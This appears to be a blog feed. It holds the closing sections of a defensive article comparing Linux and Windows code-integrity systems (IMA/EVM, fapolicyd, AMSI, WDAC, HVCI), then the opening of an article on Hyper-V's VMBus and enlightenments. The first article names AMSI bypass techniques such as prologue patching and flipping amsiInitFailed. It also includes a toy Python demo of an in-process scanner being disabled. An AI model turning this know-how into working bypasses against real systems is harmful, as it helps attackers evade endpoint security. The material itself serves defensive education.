EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid security.evm HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step "until we add a TPM" and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.

The cross-stack symmetry

Both lineages obey two architectural rules, and both have at least one place where they break each rule:

Bypass class	Linux instance	Windows instance	Root cause	Partial mitigation
Verifier shares address space with attacker	(script interpreters; no in-kernel interpreter scanner)	AMSI prologue patch, `amsiInitFailed` flag flip	Software-only protection of an in-process secret is impossible	ETW patch detection, signed providers, Constrained Language Mode
Trust grant coarser than exploit unit	fapolicyd RPM trust, before its integrity mode was added	WDAC Publisher rules + LOLBins	Trust algebra cannot express "Microsoft except mshta" with one rule	Hash-level denies, growing block list
Reference value reachable by attacker	IMA without EVM	(HVCI moved the kernel verifier out of reach)	Reference value next to the file under attacker control	EVM HMAC sealed to TPM PCR
Verifier is killable	fapolicyd daemon failure	(HVCI verifier is hypervisor-isolated)	Verifier liveness is part of the trust assumption	TPM-sealed boot policy + kernel-mode fallback

The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not "wrong", it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.

The lesson from both lineages is consistent: when an architecture is forced to put the verifier somewhere reachable, treat its output as telemetry rather than control, and budget for the bypass.

These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.

8. What the theory says

Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.

Rice's theorem

Rice's 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes a binary as input and returns the correct "malicious" or "benign" verdict in finite time for every input.

Every code-integrity stack on the market therefore reduces to the same shape: an allowlist of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call "malware detectors" -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.

No software-only protection of an in-process secret

The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.

AMSI's design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI's entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host's address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM's design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.
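The rule can be demonstrated without any Windows internals. The sketch below is an analogy in Python, not AMSI: `Scanner` and `ScriptHost` are hypothetical classes, and the "patch" is an attribute rebind rather than a prologue overwrite. The structure is the same, a scanner that lives in the process that evaluates attacker-chosen code.

```python
CLEAN, DETECTED = 0, 1

class Scanner:
    """Toy in-process scanner, standing in for an AMSI-style hook."""
    def scan(self, buffer: str) -> int:
        return DETECTED if "evil" in buffer else CLEAN

class ScriptHost:
    """Toy script host: scans a buffer, then evaluates it in-process."""
    def __init__(self):
        self.scanner = Scanner()
        self.executed = []

    def run(self, script: str) -> bool:
        if self.scanner.scan(script) == DETECTED:
            return False
        # The script runs with full access to the host's own objects.
        exec(script, {"host": self})
        self.executed.append(script)
        return True

host = ScriptHost()
blocked_before = not host.run("payload = 'evil'")

# Stage 1 contains nothing the scanner flags; it rebinds the scan method.
stage1 = "host.scanner.scan = lambda buffer: 0"
stage1_ran = host.run(stage1)

# Stage 2 is the same payload that was blocked a moment ago.
allowed_after = host.run("payload = 'evil'")
```

The scanner's logic was never wrong. It was replaced by code it had just approved, which is the whole argument for moving the verifier to an address space the evaluated code cannot write to.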

No verification of dynamically generated executable code

The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous mmap followed by mprotect(PROT_EXEC) all produce executable bytes that did not exist on disk and were never hashed.

The IPE documentation [@docs-kernel-org-lsm-ipehtml] lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC's User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.

The JIT gap is one reason both stacks ship "Constrained Language Mode"-style restricted-runtime options. PowerShell's Constrained Language Mode blocks reflection and dynamic-type creation; the JVM's --module-path and module-system encapsulation play a similar role for hosted Java code; the CLR's AppContainer and the .NET Core trim modes lean the same way. None of these "verify" the JIT output; they restrict what the runtime is willing to emit.

Cryptographic bounds

The cryptographic side, by contrast, is closed.

Any preimage-resistant hash needs $\Omega(n)$ work on the data being hashed. You cannot verify a file you do not read.
A Merkle tree with leaf size $k$ over a file of size $n$ reduces this to $O(\log(n/k))$ per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. fs-verity matches this lower bound.
Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly $2 \text{ GB/s}$ per core; SHA-512 at $\sim 1.4 \text{ GB/s}$. A 100 MB binary verifies in roughly $50 \text{ ms}$ worst-case and $0 \text{ ms}$ cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.
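The arithmetic behind those figures, as a quick check. The throughput numbers are the ones quoted above; the 4 KiB block size and 32-byte digest used for the tree-depth estimate are assumed parameters for the sketch, and both function names are hypothetical.

```python
import math

def full_hash_ms(size_bytes: int, throughput_bytes_per_s: float) -> float:
    """Time to hash a whole file once: linear in file size."""
    return size_bytes / throughput_bytes_per_s * 1000.0

def merkle_levels(size_bytes: int, block_size: int = 4096,
                  digest_size: int = 32) -> int:
    """Tree levels above the data blocks for a wide Merkle tree."""
    fanout = block_size // digest_size          # hashes per tree block
    nodes = math.ceil(size_bytes / block_size)  # data blocks to cover
    levels = 0
    while nodes > 1:
        nodes = math.ceil(nodes / fanout)
        levels += 1
    return levels

SIZE = 100_000_000                    # the 100 MB binary from the text

sha256_ms = full_hash_ms(SIZE, 2.0e9)     # roughly 2 GB/s per core
sha512_ms = full_hash_ms(SIZE, 1.4e9)     # roughly 1.4 GB/s per core
levels = merkle_levels(SIZE)
```

At 2 GB/s the whole-file pass costs about 50 ms, matching the figure above. Under the assumed parameters the same file needs only three tree levels, so a single page read is checked with a few hashes of 4 KiB each instead of one hash over 100 MB.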

So on the crypto side the gap between upper and lower bounds is closed. On the policy-expressiveness side there is no "best" policy because the right policy depends on threat model. There is no single optimum; there are only trade-offs.

Bound	What it says	Mechanism that matches it	Remaining gap
Rice's theorem	"Is this binary malicious?" is undecidable	Every CI stack is an allowlist + signer model	Allowlist composition is itself a policy problem
In-process secret	No purely-software defence inside the attacker's address space	HVCI moves verifier to VTL1; EVM key in keyring sealed to TPM	AMSI design violates this; the gap is structural
Hash verification	$\Omega(n)$ per full read; $O(\log n)$ per partial read	fs-verity per page; IMA cached on `i_iversion`	Cold-cache cost remains O(n) for non-fs-verity files
JIT and dynamic code	No way to verify code that did not exist on disk	None	Restricted-runtime modes (CLM, AppContainer) are the best partial answer
Asymmetric verify	About 60-300 us per RSA-2048 or Ed25519 verify on modern x86	Authenticode catalogues amortise; IMA caches in inode	Cold cache is the only sensitive case

Key idea: Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.

If the theory says we cannot win, what is research targeting in 2026?

9. Open frontiers

Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.

Linux integrity at distribution scale: the Integrity Digest Cache

IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file imasig signature on every open is expensive.

Roberto Sassu (Huawei Cloud) proposed a fix as the digest_cache LSM in version 3 of the patchset, posted in February 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom] and covered on LWN [@lwn-net-articles-961591]. The v3 cover letter is concrete: "Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a digest_cache_lookup() primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.
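The shape of the optimisation can be sketched as follows: verify one vendor-signed list up front, then answer each per-file question with a hash and a set lookup. This is a toy under stated assumptions, not the patchset's code. The `DigestCache` class and its `lookup` method are hypothetical, and an HMAC stands in for the vendor's asymmetric signature.

```python
import hashlib
import hmac

def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

class DigestCache:
    """Toy digest list: verified once, then consulted per file."""

    def __init__(self, digest_list: bytes, tag: bytes, vendor_key: bytes):
        # Stand-in for a vendor signature check; a real list would carry an
        # asymmetric signature, not an HMAC.
        expected = hmac.new(vendor_key, digest_list, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            raise ValueError("digest list failed verification")
        self._digests = frozenset(digest_list.decode().split())

    def lookup(self, content: bytes) -> bool:
        """Hypothetical analogue of digest_cache_lookup(): hash + set lookup."""
        return digest(content) in self._digests

# Vendor side: one list, one authentication tag, many files.
vendor_key = b"vendor-demo-key"
files = [b"/usr/bin/foo contents", b"/usr/bin/bar contents"]
digest_list = "\n".join(digest(f) for f in files).encode()
tag = hmac.new(vendor_key, digest_list, hashlib.sha256).digest()

cache = DigestCache(digest_list, tag, vendor_key)
known = cache.lookup(files[0])
unknown = cache.lookup(b"tampered contents")

# A modified list is rejected before any lookup can happen.
try:
    DigestCache(digest_list + b"\nextra", tag, vendor_key)
    list_rejected = False
except ValueError:
    list_rejected = True
```

The expensive verification happens once per list rather than once per file, which is where the quoted speedup would come from.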

By v6 in November 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom-2] the work had been retitled "Introduce the Integrity Digest Cache" and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement "introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open()." Discussion continues on the linux-integrity list [@lore-kernel-org-linux-integrity]; memory safety of the TLV parser was verified with the Frama-C [@frama-c-com] static analyser. As of late 2024 the work is not yet upstream.

The important framing correction: the Integrity Digest Cache is not a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.

Out-of-process AMSI broker

The conjectural fix on the Windows side is an out-of-process AMSI broker: every AmsiScanBuffer call IPCs to a service running outside the script host's address space. The in-process bypass family disappears because the attacker is no longer in the same process as the scanner. The cost is a context switch and serialisation overhead per script eval.

Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.

Cross-OS attestation

A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA's measurement-log format (ima_template_fmt) and Windows Measured Boot's WBCL [@trustedcomputinggroup-org-log-format] both target TPM PCRs but encode events differently.

Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.

Problem	Current best partial result	Upstream status
IMA appraisal scale on RPM-signed distros	Integrity Digest Cache, 45-65% appraisal speedup	Patchset v6 (Nov 2024); not upstream
AMSI in-process trust boundary	Signed provider DLLs, ETW patch detection, CLM	Partial; structural fix would be OOP broker
Linux script-content scanning	Nothing in production	Open
Cross-OS attestation interop	TCG CEL, TDX/SEV-SNP quotes	Platform-layer; workload-level still split
WDAC LOLBin treadmill	Microsoft block list + LOLBAS + WDAC Wizard	Operational; structural fix unknown

Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore operational, not technological.

10. Practitioner decision guide

Eight common deployment scenarios. Eight concrete answers.

If you need...	On Linux, use...	On Windows, use...
TPM-backed remote attestation	IMA + EVM (TPM PCR 10)	Measured Boot + TPM PCR 11 + HVCI
Block unsigned drivers	`module.sig_enforce=1` plus kernel module signing	HVCI (Memory Integrity)
Cryptographic allowlist of installed software	fapolicyd (RPM/DEB trust)	App Control with Publisher rules
Per-app sandbox	AppArmor or SELinux	AppContainer or App Control (no direct equivalent)
Catch in-memory PowerShell payloads	(no direct equivalent)	AMSI
Consumer-grade reputation gating	(no direct equivalent)	Smart App Control
Immutable appliance image	dm-verity + IPE	App Control with hash rules + HVCI
Large APK-style assets verified lazily	fs-verity	(no direct equivalent)

The why behind each row.

TPM-backed attestation. On Linux, IMA's measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log a Windows kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.
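
A verifier's core job on either stack is to replay the event log and check that it reproduces the PCR value the TPM quoted. A minimal sketch of that replay, assuming a SHA-256 PCR bank and treating each log entry as an opaque byte string (real IMA extends a template hash, and real Windows logs carry structured events; `pcr_extend` and `replay` are illustrative names):

```python
import hashlib

def pcr_extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM extend semantics: new PCR = H(old PCR || measurement)."""
    return hashlib.sha256(pcr + measurement).digest()

def replay(log):
    """Recompute the final PCR value from an ordered list of log entries."""
    pcr = bytes(32)  # a SHA-256 PCR starts as 32 zero bytes
    for entry in log:
        pcr = pcr_extend(pcr, hashlib.sha256(entry).digest())
    return pcr
```

Because each extend folds in the previous value, reordering or dropping an entry changes the final result, which is what lets a remote verifier trust the log rather than the host.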

Blocking unsigned drivers. Linux uses a built-in kernel module signing flag. Windows needs HVCI, because the kernel-mode CI check runs in VTL1 and any policy weakening attempted from VTL0 with SYSTEM cannot reach it.

Application allowlisting on general-purpose distributions. This is fapolicyd's wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean "trusted" list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.

Per-app sandboxing. Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; AppContainer or Microsoft Defender Attack Surface Reduction rules are the substitutes.

In-memory PowerShell payloads. AMSI's use case. Linux has nothing equivalent in production.

Consumer reputation gating. Smart App Control's use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.

Immutable appliance images. On Linux, dm-verity plus IPE. On Windows, App Control hash rules plus HVCI.

Large lazy-loaded assets. This is fs-verity territory; Windows has no public equivalent.

Common implementation pitfalls

Distilled from the same shape: every stack has a default that surprises operators.

IMA without EVM and without a TPM-sealed key is decorative. Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.
AppArmor profiles authored in complain mode never get promoted to enforce. Schedule a config-management pass that runs aa-enforce on the profiles you actually want to confine.
SELinux setenforce 0 for debugging that becomes permanent. The /.autorelabel flag is required after restoring contexts; track that you flipped it.
fapolicyd permissive-mode lapses. Set up alerting on permissive=1 in the runtime configuration; treat the daemon's exit status as a security event.
WDAC's Enabled:Audit Mode policy-rule option is on by default. Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is off before declaring rollout complete.
HVCI without a driver-compatibility check. Microsoft's DG_Readiness_Tool and the HVCI compatibility report belong in every pilot. Drivers that allocate RWX kernel pages will fail to load under HVCI, and a boot-critical one can leave the host unbootable.
Treating AMSI as a control. It is telemetry. Budget for the bypass on day one.
Smart App Control disable is one-way. A single mis-click ends the consumer reputation gate until the device is reset. Make sure the user understands this before they tap the toggle.
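
The audit-mode pitfall lends itself to an automated gate. The sketch below assumes the usual policy XML layout (an `SiPolicy` root in the `urn:schemas-microsoft-com:sipolicy` namespace, with rule options under `Rules/Rule/Option`); the `SAMPLE` document is a trimmed, hypothetical policy, and `audit_mode_enabled` is an illustrative helper, not part of any Microsoft tooling.

```python
import xml.etree.ElementTree as ET

# Assumed namespace of App Control (WDAC) policy XML files.
NS = {"si": "urn:schemas-microsoft-com:sipolicy"}

def audit_mode_enabled(policy_xml: str) -> bool:
    """Return True if the policy still carries the Enabled:Audit Mode option."""
    root = ET.fromstring(policy_xml)
    options = [
        opt.text.strip()
        for opt in root.findall("./si:Rules/si:Rule/si:Option", NS)
        if opt.text
    ]
    return "Enabled:Audit Mode" in options

# Hypothetical, heavily trimmed policy used only to exercise the check.
SAMPLE = """<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <Rules>
    <Rule><Option>Enabled:UMCI</Option></Rule>
    <Rule><Option>Enabled:Audit Mode</Option></Rule>
  </Rules>
</SiPolicy>"""
```

A rollout pipeline could run a check like this against the policy source and refuse to mark the deployment complete while it returns `True`.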

Note: On Linux: enable IMA in measure mode before appraise; deploy AppArmor / SELinux profiles in complain / permissive before enforce; run fapolicyd with permissive=1 for the first deploy. On Windows: leave WDAC's Enabled:Audit Mode set during the first rollout and use the event log to identify the policy gaps before flipping to enforced. Audit mode is the only safe way to discover that the policy is wrong before it locks you out of production.

Note: A bare IMA appraisal policy without an HMAC-keyed EVM (and without the key sealed to a TPM 2.0 PCR set) does not stop an offline attacker. If you do not have TPM-sealed key custody and signed xattrs, IMA appraisal is mostly a check-box. fapolicyd with integrity=ima may be a saner starting point on machines without a TPM.

Usually no, unless your distribution signs every system file (most do not for `imasig` in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline.

Path-based reasoning maps to how administrators think about confinement: "this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket." SELinux's type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux.

No. Microsoft's block list [@learn-microsoft-com-bypass-appcontrol] grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter.

Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls.

On CPUs with Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer) [@learn-microsoft-com-oem-vbs], the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; "free" is a Kaby Lake-and-newer claim.

Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings > Reset This PC does not bring it back.

The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.

What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice's wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.

Hyper-V Enlightenments, VMBus, and the Synthetic Device Model

noreply@paragmali.com (Parag Mali) — Thu, 14 May 2026 00:00:00 GMT

Hyper-V's guest OSes do not see emulated 1990s hardware. They see a published, versioned hypervisor ABI called the **Top-Level Functional Specification**, a transport called **VMBus** that consists of two ring buffers per channel, and a catalogue of synthetic devices whose backends live in the privileged root partition. This design is what makes Windows and Linux equally fast inside Hyper-V, and it is also why the host-side parsers in `vmswitch.sys` keep producing critical CVEs. The 2024 OpenHCL paravisor moves those parsers into the guest's own trust boundary in memory-safe Rust, which is the most consequential change to the Hyper-V device model since 2008.

1. The Type-1 hypervisor foundation

Open Task Manager on a modern Windows 11 desktop, switch to the Performance tab, and look at the line that says "Virtualization: Enabled." That single line hides one of the most consequential design choices in modern operating systems: when Microsoft shipped Hyper-V with Windows Server 2008 in June 2008 [@ms-hyperv-server-overview], they did not bolt a virtualization product on top of Windows. They put a small hypervisor underneath it.

That ordering matters more than it sounds. In the older Microsoft Virtual Server 2005 model, Windows ran on the bare metal and a user-mode service emulated PC hardware for guests inside it. In the Hyper-V architecture documented by Microsoft in 2008 [@ms-hyperv-architecture], the hypervisor boots first and Windows itself becomes a guest of the hypervisor. Microsoft calls this guest the root partition. Every other VM on the box is a child partition.

**Type-1 hypervisor**: a hypervisor that runs directly on the physical hardware rather than inside a host operating system. Hyper-V, VMware ESXi, and Xen are Type-1; VirtualBox and the original Microsoft Virtual Server are Type-2 (hosted). In a Type-1 design no general-purpose OS sits between the hypervisor and the silicon, which lets the hypervisor enforce isolation directly using CPU virtualization extensions like Intel VT-x and AMD-V.

The root partition is not just another VM. It is a privileged partition: it owns the physical I/O devices, runs the parent stack of synthetic-device backends, and brokers everything that touches real hardware. Children get virtual processors and a slice of memory, and they communicate with the root over a software bus called VMBus that we will spend most of this article taking apart.

flowchart TD
    HW["Physical hardware (CPU, RAM, NICs, NVMe)"]
    HV["Hyper-V hypervisor (microkernel)"]
    Root["Root partition (Windows Server)"]
    VSP["Virtualization Service Providers (VSPs): vmswitch.sys, storvsp.sys, ..."]
    C1["Child partition: Windows VM"]
    C2["Child partition: Linux VM"]
    VSC1["VSCs: netvsc, storvsc, ..."]
    VSC2["VSCs: hv_netvsc, hv_storvsc, ..."]
    HW --> HV
    HV --> Root
    HV --> C1
    HV --> C2
    Root --> VSP
    VSP -. "VMBus channel" .-> VSC1
    VSP -. "VMBus channel" .-> VSC2
    C1 --> VSC1
    C2 --> VSC2

The hypervisor itself is small by design. The Hyper-V architecture page on Microsoft Learn [@ms-hyperv-architecture-perf] describes it as a microkernel: it does the minimum a hypervisor must do (CPU scheduling, memory partitioning, interrupt routing, an inter-partition message bus) and pushes everything else, including the device models, out to the root partition. This is the opposite of the early VMware ESX design, where the hypervisor itself contained large device drivers.

The microkernel choice was pragmatic, not ideological. A monolithic hypervisor with built-in NIC and storage drivers would have been a catastrophic certification problem: every NIC firmware update would risk a hypervisor patch. By delegating I/O to the Windows root partition, Microsoft re-used the entire Windows driver stack.

The split also explains why Hyper-V "feels Windows-shaped" even though it is technically not Windows. The root partition is Windows, with all of its drivers, its WMI, its event log, its Get-VM PowerShell cmdlets. The hypervisor underneath is a small, separate binary (hvix64.exe on Intel, hvax64.exe on AMD) that you almost never have a reason to think about. Microsoft itself goes further: in the same architecture document, it stresses that all device-model traffic flows through the root: "the management operating system hosts virtual service providers (VSPs) that communicate over the VMBus to handle device access requests from child partitions" (Microsoft Learn: Overview of Hyper-V [@ms-overview-hyper-v]).

This sets up the question the rest of the article answers: if the hypervisor is small, the guest is unmodified Windows or Linux, and the root partition owns the real devices, then how does a guest actually do disk and network I/O at gigabit-or-better speeds without paying enormous costs to traverse all of these boundaries?

The short answer is in three pieces: enlightenments (the guest knows it is virtualized and uses hypercalls), VMBus (the inter-partition transport), and the VSP/VSC pair (split drivers that share memory through VMBus rings). The next section starts with the first of those three.

2. Enlightenments: what "knowing you are virtualized" buys you

In the early 2000s, the dominant intuition was that a hypervisor's job is to fool the guest. A perfectly faithful emulation of an Intel 440BX motherboard, a DEC 21140 NIC, and an IDE controller is what made VMware Workstation a useful product in 1999. It is also what made Microsoft Virtual Server 2005 too slow to saturate gigabit links: every out instruction on a fake NIC port trapped to the hypervisor, was decoded against an in-memory chip model, and produced a synthetic interrupt that itself trapped on the way out. The Microsoft Virtual Server retrospective on Wikipedia [@wikipedia-virtual-server] notes that the architecture had no paravirtualization support and that performance was constrained relative to later hardware-assisted designs.

Hyper-V's answer was to drop the pretence. If the guest knows it is in a VM, it can use a fast path designed for VMs instead of pretending to drive imaginary chips. Microsoft calls this knowledge an enlightenment, and the Hyper-V feature discovery page [@ms-tlfs-feature-discovery] is the contract a guest uses to learn what enlightenments the hypervisor offers.

**Enlightenment**: a modification or feature in a guest operating system that takes advantage of running under a specific hypervisor. An enlightened guest detects the hypervisor (on x86, by reading the `cpuid` leaves at `0x40000000` and above), then opts in to using paravirtual interfaces (hypercalls, synthetic timers, synthetic interrupt controllers, shared TSC pages) instead of trapping on emulated hardware. An unmodified guest would still boot, but slower.
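
Python cannot execute `cpuid` itself, so the sketch below only shows the decoding half of detection: given the EBX, ECX, and EDX values returned for leaf `0x40000000` (captured by some other means), the twelve bytes spell the hypervisor vendor signature. The register constants are the well-known Hyper-V signature values; `decode_hv_vendor` is an illustrative helper name.

```python
import struct

def decode_hv_vendor(ebx: int, ecx: int, edx: int) -> str:
    """Pack three little-endian 32-bit registers and read them as ASCII."""
    return struct.pack("<III", ebx, ecx, edx).decode("ascii")

# Register values as they would be read from cpuid leaf 0x40000000 on Hyper-V.
sig = decode_hv_vendor(0x7263694D, 0x666F736F, 0x76482074)
```

A guest that sees this signature knows which paravirtual contract it can go on to negotiate; any other string means a different hypervisor or none.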

Detection is the cheap part. The Linux kernel's Hyper-V overview document [@kernel-hyperv-overview] describes four cooperating mechanisms, layered atop one another: implicit traps that the hypervisor handles transparently, explicit hypercalls the guest issues on purpose, synthetic registers exposed as model-specific registers (MSRs) in the architectural CPU register file, and VMBus for high-bandwidth device traffic. Each layer builds on the one below it.

Key idea: The contract between Hyper-V and its guests is published. Microsoft maintains the Top-Level Functional Specification as a public document under the Open Specification Promise. That single decision is why Linux ships an in-tree Hyper-V driver stack and why VMBus is not a black box.

The hypercall page

The first thing an enlightened guest does is set up a hypercall page. The TLFS Hypercall Interface page [@ms-tlfs-hypercall] describes the dance: the guest writes its identity into HV_X64_MSR_GUEST_OS_ID (MSR 0x40000000), then writes a guest-physical address and an enable bit into HV_X64_MSR_HYPERCALL (MSR 0x40000001). The hypervisor responds by populating that page with the right opcode for the current CPU: vmcall on Intel, vmmcall on AMD. From that moment on, "make a hypercall" is a normal call into a known address rather than an opcode the kernel must hand-assemble per CPU vendor.

This trick neatly externalises the vendor-specific calling convention. Microsoft can later swap to a new opcode (say, on ARM64, where the equivalent is an HVC instruction) without any guest code change. The guest just learns the new page contents.
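
To make the second MSR write concrete, here is a minimal sketch of how the 64-bit value could be composed. It assumes the field layout described in the TLFS (enable flag in bit 0, guest page frame number in bits 63:12); `hypercall_msr_value` is a hypothetical helper, and actually writing the MSR is privileged kernel work that Python cannot perform.

```python
PAGE_SHIFT = 12             # 4 KiB pages
HYPERCALL_ENABLE = 1 << 0   # assumed layout: bit 0 enables the hypercall page

def hypercall_msr_value(page_gpa: int) -> int:
    """Compose the value a guest would write to HV_X64_MSR_HYPERCALL."""
    if page_gpa & ((1 << PAGE_SHIFT) - 1):
        raise ValueError("hypercall page must be 4 KiB aligned")
    gpfn = page_gpa >> PAGE_SHIFT  # guest page frame number
    return (gpfn << PAGE_SHIFT) | HYPERCALL_ENABLE
```

For a page at guest-physical address `0x1234000`, the composed value is `0x1234001`: the address with the enable bit set.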

The same TLFS page documents two hypercall classes: simple hypercalls (one operation, returns or faults) and rep (repeated) hypercalls that take a counter and a start index, so a long-running operation can yield mid-flight without losing work. Three calling conventions exist: a memory-based one for large parameter blocks, a register-only fast variant for the very common case of one or two inputs, and an XMM-register variant that lets a guest pass up to 112 bytes of input through SSE registers.
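
The resume-where-you-left-off behaviour of rep hypercalls is easy to model. In this sketch `fake_rep_hypercall` is a stand-in for the hypervisor (not a real interface) that processes at most `budget` elements per call and reports how many reps are complete; the caller simply reissues the call with the new start index.

```python
def fake_rep_hypercall(items, start, budget=3):
    """Hypothetical hypervisor side: handle up to `budget` elements, then yield.

    Returns the total number of reps completed so far.
    """
    done = min(len(items), start + budget)
    for i in range(start, done):
        items[i] = items[i] * 2  # placeholder for the per-element operation
    return done

def run_rep(items):
    """Guest side: reissue the call from the reported start index until finished."""
    start = 0
    calls = 0
    while start < len(items):
        start = fake_rep_hypercall(items, start)
        calls += 1
    return calls
```

Each element is processed exactly once even though the operation was interrupted, which is the property the start index exists to guarantee.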

That XMM variant is unusual enough to flag. Most kernel ABIs do not touch SSE in privileged code because saving and restoring the full SSE state is expensive. Hyper-V's hypercall ABI uses XMM precisely because the round-trip cost of a hypercall is dominated by the VMEXIT itself, so squeezing a few more bytes into registers is cheaper than spilling them to memory and reading them back.

Synthetic interrupts and synthetic timers

A guest's virtual processor has its own emulated local APIC by default, but an enlightened guest can also use a Synthetic Interrupt Controller (SynIC), defined in the TLFS. Each virtual processor gets 16 SINT slots, a per-CPU shared message page, and a per-CPU shared event page. SINTs are how VMBus signals events to the guest without going through the legacy LAPIC fast path.

**SINT** (synthetic interrupt source): one of 16 logical interrupt sources per virtual processor that the Hyper-V Synthetic Interrupt Controller can signal. SINTs are reachable through MSRs (`HV_X64_MSR_SINT0` through `HV_X64_MSR_SINT15`) and back the doorbell mechanism for VMBus channels and for synthetic timers. They are paravirtual: they would not exist on a bare-metal CPU.

